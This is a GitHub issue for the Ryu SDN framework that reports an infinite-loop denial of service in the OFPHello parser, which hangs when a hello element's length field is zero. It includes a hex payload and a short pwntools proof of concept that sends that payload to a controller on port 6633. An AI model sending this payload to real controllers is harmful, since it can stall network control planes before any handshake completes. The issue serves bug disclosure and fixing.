search

faucetsdn / ryu

Ryu component-based software defined networking framework
https://ryu-sdn.org
Apache License 2.0
1.5k stars 1.16k forks source link

Suggestion for OFPHello parser will cause an infinite loop #195

Open ErodedElk opened 5 months ago

ErodedElk commented 5 months ago

in /ryu/ofproto/ofproto_v1_3_parser.py about line=139

class OFPHello(MsgBase):
...
    @classmethod
    def parser(cls, datapath, version, msg_type, msg_len, xid, buf):
        msg = super(OFPHello, cls).parser(datapath, version, msg_type,
                                          msg_len, xid, buf)

        offset = ofproto.OFP_HELLO_HEADER_SIZE
        elems = []
        while offset < msg.msg_len:
            type_, length = struct.unpack_from(
                ofproto.OFP_HELLO_ELEM_HEADER_PACK_STR, msg.buf, offset)
            ...
            offset += length
        msg.elements = elems
        return msg

If the variable length is equal to 0,the offset will no longer change and the parsing will fall into an infinite loop.

payload:

payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
payload="04000010000000130001000000000010"
payload=bytes.fromhex(payload)p.send(payload)
p.interactive()

The Hello message is the first step in the handshake process, which means that all malicious traffic can put the controller into an infinite loop before establishing a connection with the controller.

ErodedElk commented 5 months ago

This problem also occurs with the following code: /ryu/ofproto/ofproto_v1_3_parser.py about line=139 /ryu/ofproto/ofproto_v1_4_parser.py about line=103 /ryu/ofproto/ofproto_v1_5_parser.py about line=104